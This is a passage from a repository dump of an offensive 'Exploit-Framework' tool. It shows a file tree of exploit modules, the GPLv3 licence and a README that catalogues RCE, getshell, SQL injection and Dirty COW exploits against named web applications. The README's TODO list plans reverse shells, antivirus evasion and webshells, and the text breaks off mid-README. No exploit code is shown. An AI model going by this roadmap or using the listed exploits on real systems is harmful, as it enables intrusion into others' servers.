├── .gitignore ├── LICENSE ├── README.md ├── core ├── banner │ └── banner.py └── log │ ├── Log.py │ └── color.py ├── exploit ├── codiad │ ├── cve_2014_9581.py │ └── cve_2017_11366.py ├── dedecms │ └── dedecms_recommand_php_sql_injection.py ├── joomla │ └── cve_2015_8562.py ├── kernel │ └── cve_2016_5195.py ├── moadmin │ └── cve_2015_2208.py ├── opensns │ └── front_page_getshell.py ├── seacms │ ├── cve_2017_17561.py │ └── seacms_v628_rce.py ├── wordpress │ └── cve_2017_5487.py └── zblog │ └── zblog_authenticated_getshell.py └── framework.py /.gitignore: -------------------------------------------------------------------------------- 1 | *.pyc 2 | .history 3 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | GNU GENERAL PUBLIC LICENSE 2 | Version 3, 29 June 2007 3 | 4 | Copyright (C) 2007 Free Software Foundation, Inc. 5 | Everyone is permitted to copy and distribute verbatim copies 6 | of this license document, but changing it is not allowed. 7 | 8 | Preamble 9 | 10 | The GNU General Public License is a free, copyleft license for 11 | software and other kinds of works. 12 | 13 | The licenses for most software and other practical works are designed 14 | to take away your freedom to share and change the works. By contrast, 15 | the GNU General Public License is intended to guarantee your freedom to 16 | share and change all versions of a program--to make sure it remains free 17 | software for all its users. We, the Free Software Foundation, use the 18 | GNU General Public License for most of our software; it applies also to 19 | any other work released this way by its authors. You can apply it to 20 | your programs, too. 21 | 22 | When we speak of free software, we are referring to freedom, not 23 | price. Our General Public Licenses are designed to make sure that you 24 | have the freedom to distribute copies of free software (and charge for 25 | them if you wish), that you receive source code or can get it if you 26 | want it, that you can change the software or use pieces of it in new 27 | free programs, and that you know you can do these things. 28 | 29 | To protect your rights, we need to prevent others from denying you 30 | these rights or asking you to surrender the rights. Therefore, you have 31 | certain responsibilities if you distribute copies of the software, or if 32 | you modify it: responsibilities to respect the freedom of others. 33 | 34 | For example, if you distribute copies of such a program, whether 35 | gratis or for a fee, you must pass on to the recipients the same 36 | freedoms that you received. You must make sure that they, too, receive 37 | or can get the source code. And you must show them these terms so they 38 | know their rights. 39 | 40 | Developers that use the GNU GPL protect your rights with two steps: 41 | (1) assert copyright on the software, and (2) offer you this License 42 | giving you legal permission to copy, distribute and/or modify it. 43 | 44 | For the developers' and authors' protection, the GPL clearly explains 45 | that there is no warranty for this free software. For both users' and 46 | authors' sake, the GPL requires that modified versions be marked as 47 | changed, so that their problems will not be attributed erroneously to 48 | authors of previous versions. 49 | 50 | Some devices are designed to deny users access to install or run 51 | modified versions of the software inside them, although the manufacturer 52 | can do so. This is fundamentally incompatible with the aim of 53 | protecting users' freedom to change the software. The systematic 54 | pattern of such abuse occurs in the area of products for individuals to 55 | use, which is precisely where it is most unacceptable. Therefore, we 56 | have designed this version of the GPL to prohibit the practice for those 57 | products. If such problems arise substantially in other domains, we 58 | stand ready to extend this provision to those domains in future versions 59 | of the GPL, as needed to protect the freedom of users. 60 | 61 | Finally, every program is threatened constantly by software patents. 62 | States should not allow patents to restrict development and use of 63 | software on general-purpose computers, but in those that do, we wish to 64 | avoid the special danger that patents applied to a free program could 65 | make it effectively proprietary. To prevent this, the GPL assures that 66 | patents cannot be used to render the program non-free. 67 | 68 | The precise terms and conditions for copying, distribution and 69 | modification follow. 70 | 71 | TERMS AND CONDITIONS 72 | 73 | 0. Definitions. 74 | 75 | "This License" refers to version 3 of the GNU General Public License. 76 | 77 | "Copyright" also means copyright-like laws that apply to other kinds of 78 | works, such as semiconductor masks. 79 | 80 | "The Program" refers to any copyrightable work licensed under this 81 | License. Each licensee is addressed as "you". "Licensees" and 82 | "recipients" may be individuals or organizations. 83 | 84 | To "modify" a work means to copy from or adapt all or part of the work 85 | in a fashion requiring copyright permission, other than the making of an 86 | exact copy. The resulting work is called a "modified version" of the 87 | earlier work or a work "based on" the earlier work. 88 | 89 | A "covered work" means either the unmodified Program or a work based 90 | on the Program. 91 | 92 | To "propagate" a work means to do anything with it that, without 93 | permission, would make you directly or secondarily liable for 94 | infringement under applicable copyright law, except executing it on a 95 | computer or modifying a private copy. Propagation includes copying, 96 | distribution (with or without modification), making available to the 97 | public, and in some countries other activities as well. 98 | 99 | To "convey" a work means any kind of propagation that enables other 100 | parties to make or receive copies. Mere interaction with a user through 101 | a computer network, with no transfer of a copy, is not conveying. 102 | 103 | An interactive user interface displays "Appropriate Legal Notices" 104 | to the extent that it includes a convenient and prominently visible 105 | feature that (1) displays an appropriate copyright notice, and (2) 106 | tells the user that there is no warranty for the work (except to the 107 | extent that warranties are provided), that licensees may convey the 108 | work under this License, and how to view a copy of this License. If 109 | the interface presents a list of user commands or options, such as a 110 | menu, a prominent item in the list meets this criterion. 111 | 112 | 1. Source Code. 113 | 114 | The "source code" for a work means the preferred form of the work 115 | for making modifications to it. "Object code" means any non-source 116 | form of a work. 117 | 118 | A "Standard Interface" means an interface that either is an official 119 | standard defined by a recognized standards body, or, in the case of 120 | interfaces specified for a particular programming language, one that 121 | is widely used among developers working in that language. 122 | 123 | The "System Libraries" of an executable work include anything, other 124 | than the work as a whole, that (a) is included in the normal form of 125 | packaging a Major Component, but which is not part of that Major 126 | Component, and (b) serves only to enable use of the work with that 127 | Major Component, or to implement a Standard Interface for which an 128 | implementation is available to the public in source code form. A 129 | "Major Component", in this context, means a major essential component 130 | (kernel, window system, and so on) of the specific operating system 131 | (if any) on which the executable work runs, or a compiler used to 132 | produce the work, or an object code interpreter used to run it. 133 | 134 | The "Corresponding Source" for a work in object code form means all 135 | the source code needed to generate, install, and (for an executable 136 | work) run the object code and to modify the work, including scripts to 137 | control those activities. However, it does not include the work's 138 | System Libraries, or general-purpose tools or generally available free 139 | programs which are used unmodified in performing those activities but 140 | which are not part of the work. For example, Corresponding Source 141 | includes interface definition files associated with source files for 142 | the work, and the source code for shared libraries and dynamically 143 | linked subprograms that the work is specifically designed to require, 144 | such as by intimate data communication or control flow between those 145 | subprograms and other parts of the work. 146 | 147 | The Corresponding Source need not include anything that users 148 | can regenerate automatically from other parts of the Corresponding 149 | Source. 150 | 151 | The Corresponding Source for a work in source code form is that 152 | same work. 153 | 154 | 2. Basic Permissions. 155 | 156 | All rights granted under this License are granted for the term of 157 | copyright on the Program, and are irrevocable provided the stated 158 | conditions are met. This License explicitly affirms your unlimited 159 | permission to run the unmodified Program. The output from running a 160 | covered work is covered by this License only if the output, given its 161 | content, constitutes a covered work. This License acknowledges your 162 | rights of fair use or other equivalent, as provided by copyright law. 163 | 164 | You may make, run and propagate covered works that you do not 165 | convey, without conditions so long as your license otherwise remains 166 | in force. You may convey covered works to others for the sole purpose 167 | of having them make modifications exclusively for you, or provide you 168 | with facilities for running those works, provided that you comply with 169 | the terms of this License in conveying all material for which you do 170 | not control copyright. Those thus making or running the covered works 171 | for you must do so exclusively on your behalf, under your direction 172 | and control, on terms that prohibit them from making any copies of 173 | your copyrighted material outside their relationship with you. 174 | 175 | Conveying under any other circumstances is permitted solely under 176 | the conditions stated below. Sublicensing is not allowed; section 10 177 | makes it unnecessary. 178 | 179 | 3. Protecting Users' Legal Rights From Anti-Circumvention Law. 180 | 181 | No covered work shall be deemed part of an effective technological 182 | measure under any applicable law fulfilling obligations under article 183 | 11 of the WIPO copyright treaty adopted on 20 December 1996, or 184 | similar laws prohibiting or restricting circumvention of such 185 | measures. 186 | 187 | When you convey a covered work, you waive any legal power to forbid 188 | circumvention of technological measures to the extent such circumvention 189 | is effected by exercising rights under this License with respect to 190 | the covered work, and you disclaim any intention to limit operation or 191 | modification of the work as a means of enforcing, against the work's 192 | users, your or third parties' legal rights to forbid circumvention of 193 | technological measures. 194 | 195 | 4. Conveying Verbatim Copies. 196 | 197 | You may convey verbatim copies of the Program's source code as you 198 | receive it, in any medium, provided that you conspicuously and 199 | appropriately publish on each copy an appropriate copyright notice; 200 | keep intact all notices stating that this License and any 201 | non-permissive terms added in accord with section 7 apply to the code; 202 | keep intact all notices of the absence of any warranty; and give all 203 | recipients a copy of this License along with the Program. 204 | 205 | You may charge any price or no price for each copy that you convey, 206 | and you may offer support or warranty protection for a fee. 207 | 208 | 5. Conveying Modified Source Versions. 209 | 210 | You may convey a work based on the Program, or the modifications to 211 | produce it from the Program, in the form of source code under the 212 | terms of section 4, provided that you also meet all of these conditions: 213 | 214 | a) The work must carry prominent notices stating that you modified 215 | it, and giving a relevant date. 216 | 217 | b) The work must carry prominent notices stating that it is 218 | released under this License and any conditions added under section 219 | 7. This requirement modifies the requirement in section 4 to 220 | "keep intact all notices". 221 | 222 | c) You must license the entire work, as a whole, under this 223 | License to anyone who comes into possession of a copy. This 224 | License will therefore apply, along with any applicable section 7 225 | additional terms, to the whole of the work, and all its parts, 226 | regardless of how they are packaged. This License gives no 227 | permission to license the work in any other way, but it does not 228 | invalidate such permission if you have separately received it. 229 | 230 | d) If the work has interactive user interfaces, each must display 231 | Appropriate Legal Notices; however, if the Program has interactive 232 | interfaces that do not display Appropriate Legal Notices, your 233 | work need not make them do so. 234 | 235 | A compilation of a covered work with other separate and independent 236 | works, which are not by their nature extensions of the covered work, 237 | and which are not combined with it such as to form a larger program, 238 | in or on a volume of a storage or distribution medium, is called an 239 | "aggregate" if the compilation and its resulting copyright are not 240 | used to limit the access or legal rights of the compilation's users 241 | beyond what the individual works permit. Inclusion of a covered work 242 | in an aggregate does not cause this License to apply to the other 243 | parts of the aggregate. 244 | 245 | 6. Conveying Non-Source Forms. 246 | 247 | You may convey a covered work in object code form under the terms 248 | of sections 4 and 5, provided that you also convey the 249 | machine-readable Corresponding Source under the terms of this License, 250 | in one of these ways: 251 | 252 | a) Convey the object code in, or embodied in, a physical product 253 | (including a physical distribution medium), accompanied by the 254 | Corresponding Source fixed on a durable physical medium 255 | customarily used for software interchange. 256 | 257 | b) Convey the object code in, or embodied in, a physical product 258 | (including a physical distribution medium), accompanied by a 259 | written offer, valid for at least three years and valid for as 260 | long as you offer spare parts or customer support for that product 261 | model, to give anyone who possesses the object code either (1) a 262 | copy of the Corresponding Source for all the software in the 263 | product that is covered by this License, on a durable physical 264 | medium customarily used for software interchange, for a price no 265 | more than your reasonable cost of physically performing this 266 | conveying of source, or (2) access to copy the 267 | Corresponding Source from a network server at no charge. 268 | 269 | c) Convey individual copies of the object code with a copy of the 270 | written offer to provide the Corresponding Source. This 271 | alternative is allowed only occasionally and noncommercially, and 272 | only if you received the object code with such an offer, in accord 273 | with subsection 6b. 274 | 275 | d) Convey the object code by offering access from a designated 276 | place (gratis or for a charge), and offer equivalent access to the 277 | Corresponding Source in the same way through the same place at no 278 | further charge. You need not require recipients to copy the 279 | Corresponding Source along with the object code. If the place to 280 | copy the object code is a network server, the Corresponding Source 281 | may be on a different server (operated by you or a third party) 282 | that supports equivalent copying facilities, provided you maintain 283 | clear directions next to the object code saying where to find the 284 | Corresponding Source. Regardless of what server hosts the 285 | Corresponding Source, you remain obligated to ensure that it is 286 | available for as long as needed to satisfy these requirements. 287 | 288 | e) Convey the object code using peer-to-peer transmission, provided 289 | you inform other peers where the object code and Corresponding 290 | Source of the work are being offered to the general public at no 291 | charge under subsection 6d. 292 | 293 | A separable portion of the object code, whose source code is excluded 294 | from the Corresponding Source as a System Library, need not be 295 | included in conveying the object code work. 296 | 297 | A "User Product" is either (1) a "consumer product", which means any 298 | tangible personal property which is normally used for personal, family, 299 | or household purposes, or (2) anything designed or sold for incorporation 300 | into a dwelling. In determining whether a product is a consumer product, 301 | doubtful cases shall be resolved in favor of coverage. For a particular 302 | product received by a particular user, "normally used" refers to a 303 | typical or common use of that class of product, regardless of the status 304 | of the particular user or of the way in which the particular user 305 | actually uses, or expects or is expected to use, the product. A product 306 | is a consumer product regardless of whether the product has substantial 307 | commercial, industrial or non-consumer uses, unless such uses represent 308 | the only significant mode of use of the product. 309 | 310 | "Installation Information" for a User Product means any methods, 311 | procedures, authorization keys, or other information required to install 312 | and execute modified versions of a covered work in that User Product from 313 | a modified version of its Corresponding Source. The information must 314 | suffice to ensure that the continued functioning of the modified object 315 | code is in no case prevented or interfered with solely because 316 | modification has been made. 317 | 318 | If you convey an object code work under this section in, or with, or 319 | specifically for use in, a User Product, and the conveying occurs as 320 | part of a transaction in which the right of possession and use of the 321 | User Product is transferred to the recipient in perpetuity or for a 322 | fixed term (regardless of how the transaction is characterized), the 323 | Corresponding Source conveyed under this section must be accompanied 324 | by the Installation Information. But this requirement does not apply 325 | if neither you nor any third party retains the ability to install 326 | modified object code on the User Product (for example, the work has 327 | been installed in ROM). 328 | 329 | The requirement to provide Installation Information does not include a 330 | requirement to continue to provide support service, warranty, or updates 331 | for a work that has been modified or installed by the recipient, or for 332 | the User Product in which it has been modified or installed. Access to a 333 | network may be denied when the modification itself materially and 334 | adversely affects the operation of the network or violates the rules and 335 | protocols for communication across the network. 336 | 337 | Corresponding Source conveyed, and Installation Information provided, 338 | in accord with this section must be in a format that is publicly 339 | documented (and with an implementation available to the public in 340 | source code form), and must require no special password or key for 341 | unpacking, reading or copying. 342 | 343 | 7. Additional Terms. 344 | 345 | "Additional permissions" are terms that supplement the terms of this 346 | License by making exceptions from one or more of its conditions. 347 | Additional permissions that are applicable to the entire Program shall 348 | be treated as though they were included in this License, to the extent 349 | that they are valid under applicable law. If additional permissions 350 | apply only to part of the Program, that part may be used separately 351 | under those permissions, but the entire Program remains governed by 352 | this License without regard to the additional permissions. 353 | 354 | When you convey a copy of a covered work, you may at your option 355 | remove any additional permissions from that copy, or from any part of 356 | it. (Additional permissions may be written to require their own 357 | removal in certain cases when you modify the work.) You may place 358 | additional permissions on material, added by you to a covered work, 359 | for which you have or can give appropriate copyright permission. 360 | 361 | Notwithstanding any other provision of this License, for material you 362 | add to a covered work, you may (if authorized by the copyright holders of 363 | that material) supplement the terms of this License with terms: 364 | 365 | a) Disclaiming warranty or limiting liability differently from the 366 | terms of sections 15 and 16 of this License; or 367 | 368 | b) Requiring preservation of specified reasonable legal notices or 369 | author attributions in that material or in the Appropriate Legal 370 | Notices displayed by works containing it; or 371 | 372 | c) Prohibiting misrepresentation of the origin of that material, or 373 | requiring that modified versions of such material be marked in 374 | reasonable ways as different from the original version; or 375 | 376 | d) Limiting the use for publicity purposes of names of licensors or 377 | authors of the material; or 378 | 379 | e) Declining to grant rights under trademark law for use of some 380 | trade names, trademarks, or service marks; or 381 | 382 | f) Requiring indemnification of licensors and authors of that 383 | material by anyone who conveys the material (or modified versions of 384 | it) with contractual assumptions of liability to the recipient, for 385 | any liability that these contractual assumptions directly impose on 386 | those licensors and authors. 387 | 388 | All other non-permissive additional terms are considered "further 389 | restrictions" within the meaning of section 10. If the Program as you 390 | received it, or any part of it, contains a notice stating that it is 391 | governed by this License along with a term that is a further 392 | restriction, you may remove that term. If a license document contains 393 | a further restriction but permits relicensing or conveying under this 394 | License, you may add to a covered work material governed by the terms 395 | of that license document, provided that the further restriction does 396 | not survive such relicensing or conveying. 397 | 398 | If you add terms to a covered work in accord with this section, you 399 | must place, in the relevant source files, a statement of the 400 | additional terms that apply to those files, or a notice indicating 401 | where to find the applicable terms. 402 | 403 | Additional terms, permissive or non-permissive, may be stated in the 404 | form of a separately written license, or stated as exceptions; 405 | the above requirements apply either way. 406 | 407 | 8. Termination. 408 | 409 | You may not propagate or modify a covered work except as expressly 410 | provided under this License. Any attempt otherwise to propagate or 411 | modify it is void, and will automatically terminate your rights under 412 | this License (including any patent licenses granted under the third 413 | paragraph of section 11). 414 | 415 | However, if you cease all violation of this License, then your 416 | license from a particular copyright holder is reinstated (a) 417 | provisionally, unless and until the copyright holder explicitly and 418 | finally terminates your license, and (b) permanently, if the copyright 419 | holder fails to notify you of the violation by some reasonable means 420 | prior to 60 days after the cessation. 421 | 422 | Moreover, your license from a particular copyright holder is 423 | reinstated permanently if the copyright holder notifies you of the 424 | violation by some reasonable means, this is the first time you have 425 | received notice of violation of this License (for any work) from that 426 | copyright holder, and you cure the violation prior to 30 days after 427 | your receipt of the notice. 428 | 429 | Termination of your rights under this section does not terminate the 430 | licenses of parties who have received copies or rights from you under 431 | this License. If your rights have been terminated and not permanently 432 | reinstated, you do not qualify to receive new licenses for the same 433 | material under section 10. 434 | 435 | 9. Acceptance Not Required for Having Copies. 436 | 437 | You are not required to accept this License in order to receive or 438 | run a copy of the Program. Ancillary propagation of a covered work 439 | occurring solely as a consequence of using peer-to-peer transmission 440 | to receive a copy likewise does not require acceptance. However, 441 | nothing other than this License grants you permission to propagate or 442 | modify any covered work. These actions infringe copyright if you do 443 | not accept this License. Therefore, by modifying or propagating a 444 | covered work, you indicate your acceptance of this License to do so. 445 | 446 | 10. Automatic Licensing of Downstream Recipients. 447 | 448 | Each time you convey a covered work, the recipient automatically 449 | receives a license from the original licensors, to run, modify and 450 | propagate that work, subject to this License. You are not responsible 451 | for enforcing compliance by third parties with this License. 452 | 453 | An "entity transaction" is a transaction transferring control of an 454 | organization, or substantially all assets of one, or subdividing an 455 | organization, or merging organizations. If propagation of a covered 456 | work results from an entity transaction, each party to that 457 | transaction who receives a copy of the work also receives whatever 458 | licenses to the work the party's predecessor in interest had or could 459 | give under the previous paragraph, plus a right to possession of the 460 | Corresponding Source of the work from the predecessor in interest, if 461 | the predecessor has it or can get it with reasonable efforts. 462 | 463 | You may not impose any further restrictions on the exercise of the 464 | rights granted or affirmed under this License. For example, you may 465 | not impose a license fee, royalty, or other charge for exercise of 466 | rights granted under this License, and you may not initiate litigation 467 | (including a cross-claim or counterclaim in a lawsuit) alleging that 468 | any patent claim is infringed by making, using, selling, offering for 469 | sale, or importing the Program or any portion of it. 470 | 471 | 11. Patents. 472 | 473 | A "contributor" is a copyright holder who authorizes use under this 474 | License of the Program or a work on which the Program is based. The 475 | work thus licensed is called the contributor's "contributor version". 476 | 477 | A contributor's "essential patent claims" are all patent claims 478 | owned or controlled by the contributor, whether already acquired or 479 | hereafter acquired, that would be infringed by some manner, permitted 480 | by this License, of making, using, or selling its contributor version, 481 | but do not include claims that would be infringed only as a 482 | consequence of further modification of the contributor version. For 483 | purposes of this definition, "control" includes the right to grant 484 | patent sublicenses in a manner consistent with the requirements of 485 | this License. 486 | 487 | Each contributor grants you a non-exclusive, worldwide, royalty-free 488 | patent license under the contributor's essential patent claims, to 489 | make, use, sell, offer for sale, import and otherwise run, modify and 490 | propagate the contents of its contributor version. 491 | 492 | In the following three paragraphs, a "patent license" is any express 493 | agreement or commitment, however denominated, not to enforce a patent 494 | (such as an express permission to practice a patent or covenant not to 495 | sue for patent infringement). To "grant" such a patent license to a 496 | party means to make such an agreement or commitment not to enforce a 497 | patent against the party. 498 | 499 | If you convey a covered work, knowingly relying on a patent license, 500 | and the Corresponding Source of the work is not available for anyone 501 | to copy, free of charge and under the terms of this License, through a 502 | publicly available network server or other readily accessible means, 503 | then you must either (1) cause the Corresponding Source to be so 504 | available, or (2) arrange to deprive yourself of the benefit of the 505 | patent license for this particular work, or (3) arrange, in a manner 506 | consistent with the requirements of this License, to extend the patent 507 | license to downstream recipients. "Knowingly relying" means you have 508 | actual knowledge that, but for the patent license, your conveying the 509 | covered work in a country, or your recipient's use of the covered work 510 | in a country, would infringe one or more identifiable patents in that 511 | country that you have reason to believe are valid. 512 | 513 | If, pursuant to or in connection with a single transaction or 514 | arrangement, you convey, or propagate by procuring conveyance of, a 515 | covered work, and grant a patent license to some of the parties 516 | receiving the covered work authorizing them to use, propagate, modify 517 | or convey a specific copy of the covered work, then the patent license 518 | you grant is automatically extended to all recipients of the covered 519 | work and works based on it. 520 | 521 | A patent license is "discriminatory" if it does not include within 522 | the scope of its coverage, prohibits the exercise of, or is 523 | conditioned on the non-exercise of one or more of the rights that are 524 | specifically granted under this License. You may not convey a covered 525 | work if you are a party to an arrangement with a third party that is 526 | in the business of distributing software, under which you make payment 527 | to the third party based on the extent of your activity of conveying 528 | the work, and under which the third party grants, to any of the 529 | parties who would receive the covered work from you, a discriminatory 530 | patent license (a) in connection with copies of the covered work 531 | conveyed by you (or copies made from those copies), or (b) primarily 532 | for and in connection with specific products or compilations that 533 | contain the covered work, unless you entered into that arrangement, 534 | or that patent license was granted, prior to 28 March 2007. 535 | 536 | Nothing in this License shall be construed as excluding or limiting 537 | any implied license or other defenses to infringement that may 538 | otherwise be available to you under applicable patent law. 539 | 540 | 12. No Surrender of Others' Freedom. 541 | 542 | If conditions are imposed on you (whether by court order, agreement or 543 | otherwise) that contradict the conditions of this License, they do not 544 | excuse you from the conditions of this License. If you cannot convey a 545 | covered work so as to satisfy simultaneously your obligations under this 546 | License and any other pertinent obligations, then as a consequence you may 547 | not convey it at all. For example, if you agree to terms that obligate you 548 | to collect a royalty for further conveying from those to whom you convey 549 | the Program, the only way you could satisfy both those terms and this 550 | License would be to refrain entirely from conveying the Program. 551 | 552 | 13. Use with the GNU Affero General Public License. 553 | 554 | Notwithstanding any other provision of this License, you have 555 | permission to link or combine any covered work with a work licensed 556 | under version 3 of the GNU Affero General Public License into a single 557 | combined work, and to convey the resulting work. The terms of this 558 | License will continue to apply to the part which is the covered work, 559 | but the special requirements of the GNU Affero General Public License, 560 | section 13, concerning interaction through a network will apply to the 561 | combination as such. 562 | 563 | 14. Revised Versions of this License. 564 | 565 | The Free Software Foundation may publish revised and/or new versions of 566 | the GNU General Public License from time to time. Such new versions will 567 | be similar in spirit to the present version, but may differ in detail to 568 | address new problems or concerns. 569 | 570 | Each version is given a distinguishing version number. If the 571 | Program specifies that a certain numbered version of the GNU General 572 | Public License "or any later version" applies to it, you have the 573 | option of following the terms and conditions either of that numbered 574 | version or of any later version published by the Free Software 575 | Foundation. If the Program does not specify a version number of the 576 | GNU General Public License, you may choose any version ever published 577 | by the Free Software Foundation. 578 | 579 | If the Program specifies that a proxy can decide which future 580 | versions of the GNU General Public License can be used, that proxy's 581 | public statement of acceptance of a version permanently authorizes you 582 | to choose that version for the Program. 583 | 584 | Later license versions may give you additional or different 585 | permissions. However, no additional obligations are imposed on any 586 | author or copyright holder as a result of your choosing to follow a 587 | later version. 588 | 589 | 15. Disclaimer of Warranty. 590 | 591 | THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY 592 | APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT 593 | HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY 594 | OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, 595 | THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR 596 | PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM 597 | IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF 598 | ALL NECESSARY SERVICING, REPAIR OR CORRECTION. 599 | 600 | 16. Limitation of Liability. 601 | 602 | IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING 603 | WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS 604 | THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY 605 | GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE 606 | USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF 607 | DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD 608 | PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), 609 | EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF 610 | SUCH DAMAGES. 611 | 612 | 17. Interpretation of Sections 15 and 16. 613 | 614 | If the disclaimer of warranty and limitation of liability provided 615 | above cannot be given local legal effect according to their terms, 616 | reviewing courts shall apply local law that most closely approximates 617 | an absolute waiver of all civil liability in connection with the 618 | Program, unless a warranty or assumption of liability accompanies a 619 | copy of the Program in return for a fee. 620 | 621 | END OF TERMS AND CONDITIONS 622 | 623 | How to Apply These Terms to Your New Programs 624 | 625 | If you develop a new program, and you want it to be of the greatest 626 | possible use to the public, the best way to achieve this is to make it 627 | free software which everyone can redistribute and change under these terms. 628 | 629 | To do so, attach the following notices to the program. It is safest 630 | to attach them to the start of each source file to most effectively 631 | state the exclusion of warranty; and each file should have at least 632 | the "copyright" line and a pointer to where the full notice is found. 633 | 634 | 635 | Copyright (C) 636 | 637 | This program is free software: you can redistribute it and/or modify 638 | it under the terms of the GNU General Public License as published by 639 | the Free Software Foundation, either version 3 of the License, or 640 | (at your option) any later version. 641 | 642 | This program is distributed in the hope that it will be useful, 643 | but WITHOUT ANY WARRANTY; without even the implied warranty of 644 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 645 | GNU General Public License for more details. 646 | 647 | You should have received a copy of the GNU General Public License 648 | along with this program. If not, see . 649 | 650 | Also add information on how to contact you by electronic and paper mail. 651 | 652 | If the program does terminal interaction, make it output a short 653 | notice like this when it starts in an interactive mode: 654 | 655 | Copyright (C) 656 | This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'. 657 | This is free software, and you are welcome to redistribute it 658 | under certain conditions; type `show c' for details. 659 | 660 | The hypothetical commands `show w' and `show c' should show the appropriate 661 | parts of the General Public License. Of course, your program's commands 662 | might be different; for a GUI interface, you would use an "about box". 663 | 664 | You should also get your employer (if you work as a programmer) or school, 665 | if any, to sign a "copyright disclaimer" for the program, if necessary. 666 | For more information on this, and how to apply and follow the GNU GPL, see 667 | . 668 | 669 | The GNU General Public License does not permit incorporating your program 670 | into proprietary programs. If your program is a subroutine library, you 671 | may consider it more useful to permit linking proprietary applications with 672 | the library. If this is what you want to do, use the GNU Lesser General 673 | Public License instead of this License. But first, please read 674 | . 675 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Exploit-Framework 2 | [![Backers on Open Collective](https://opencollective.com/Exploit-Framework/backers/badge.svg)](#backers) 3 | [![Sponsors on Open Collective](https://opencollective.com/Exploit-Framework/sponsors/badge.svg)](#sponsors) 4 | #### Exploits: 5 | 6 | |Vendor|Vulnerability|Effected Version|Description|Author| 7 | |:-:|:-:|:-:|:-:|:-:| 8 | |[zblog](https://www.zblogcn.com/zblogphp/)|[NOT_CVE](https://gist.github.com/WangYihang/318020687b7e5f1efb38e9afd40c941b)|<=1.5.1|Zblog Authenticated LFI|[@Shutdown_r](http://www.jianshu.com/u/0876d51c215f)| 9 | |[OpenSNS](http://www.opensns.cn/)|[NOT_CVE](http://0day5.com/archives/4280/)|<=3.31|OpenSNS UnAuthenticated GetShell|[@90sec](https://forum.90sec.org/)| 10 | |[Joomla](https://www.joomla.org/)|[CVE-2015-8562](https://blog.sucuri.net/2015/12/joomla-remote-code-execution-the-details.html)|1.5<3.45|Joomla Header Unauthenticated RCE|[@Andrew McNicol](https://github.com/anarcoder)| 11 | |[Codiad](https://github.com/Codiad/Codiad)|[CVE-2017-11366](https://nvd.nist.gov/vuln/detail/CVE-2017-11366)|<=2.8.3|Codiad Authenticated RCE|[@WangYihang](https://github.com/wangyihang)| 12 | |[Codiad](https://github.com/Codiad/Codiad)|[CVE-2014-9581](https://nvd.nist.gov/vuln/detail/CVE-2014-9581)|<=2.4.3|Codiad Authenticated LFI|[@TaurusOmar](https://www.exploit-db.com/author/?a=7716)| 13 | |[SeaCMS](http://www.seacms.net)|[CVE-2017-17561](https://nvd.nist.gov/vuln/detail/CVE-2017-17561)|<=6.56|SeaCMS Authenticated GetShell|[@WangYihang](https://github.com/wangyihang)| 14 | |[SeaCMS](http://www.seacms.net)|[NOT_CVE](http://0day5.com/archives/4180/)|<=6.28|SeaCMS UnAuthenticated RCE|[@没穿底裤](http://0day5.com/author/1/)| 15 | |[phpMoAdmin](http://www.phpmoadmin.com/)|[CVE-2015-2208](https://www.exploit-db.com/exploits/36251/)|<=1.1.2|phpMoAdmin UnAuthenticated RCE|Unknown| 16 | |[WordPress](https://wordpress.org/)|[CVE-2017-5487](https://www.exploit-db.com/exploits/41497/)|<4.7.1|WordPress Username Enumeration|[@Dctor](https://www.facebook.com/hatbashbr/)| 17 | |[DedeCMS](http://www.dedecms.com/)|[NOT_CVE](http://0day5.com/archives/1349/)|<=5.6|DedeCms recommend.php SQL injection|[@没穿底裤](http://0day5.com/author/1/)| 18 | |[Kernel](https://www.kernel.org/)|[CVE-2016-5195](https://dirtycow.ninja/)|2.6.22<3.9|DirtyC0w Privilege Escalation|[@nowsecure](https://github.com/nowsecure)| 19 | 20 | #### Video: 21 | [![asciicast](https://asciinema.org/a/152418.png)](https://asciinema.org/a/152418) 22 | 23 | #### WIKI: 24 | > https://github.com/WangYihang/Exploit-Framework/wiki 25 | 26 | #### Contribution: 27 | > [1. Guidance of writing exploit module](https://github.com/WangYihang/Exploit-Framework/wiki/Contributing-to-Exploit-Framework) 28 | 29 | #### TODO: 30 | - [ ] 解析字符串 31 | - [ ] 深层模块化 32 | - [ ] 上下文栈维护 33 | - [ ] 日志 34 | - [ ] 自动补全 35 | - [ ] Exploit 搜索 36 | - [ ] Wiki 37 | - [ ] Exploit 规范 38 | - [ ] 维护 Reverse Shell (结合 Reverse-Shell-Manager) 39 | - [ ] Payload 模块 40 | - [ ] 免杀模块 41 | - [ ] 维护一句话木马 (结合 Webshell-Sniper) 42 | - [ ] 数据库 43 | - [ ] Web 前端 44 | 45 | 46 | ## Contributors 47 | 48 | This project exists thanks to all the people who contribute. 49 | 50 | 51 | 52 | ## Backers 53 | 54 | Thank you to all our backers! 🙏 [[Become a backer](https://opencollective.com/Exploit-Framework#backer)] 55 | 56 | 57 | 58 | 59 | ## Sponsors 60 | 61 | Support this project by becoming a 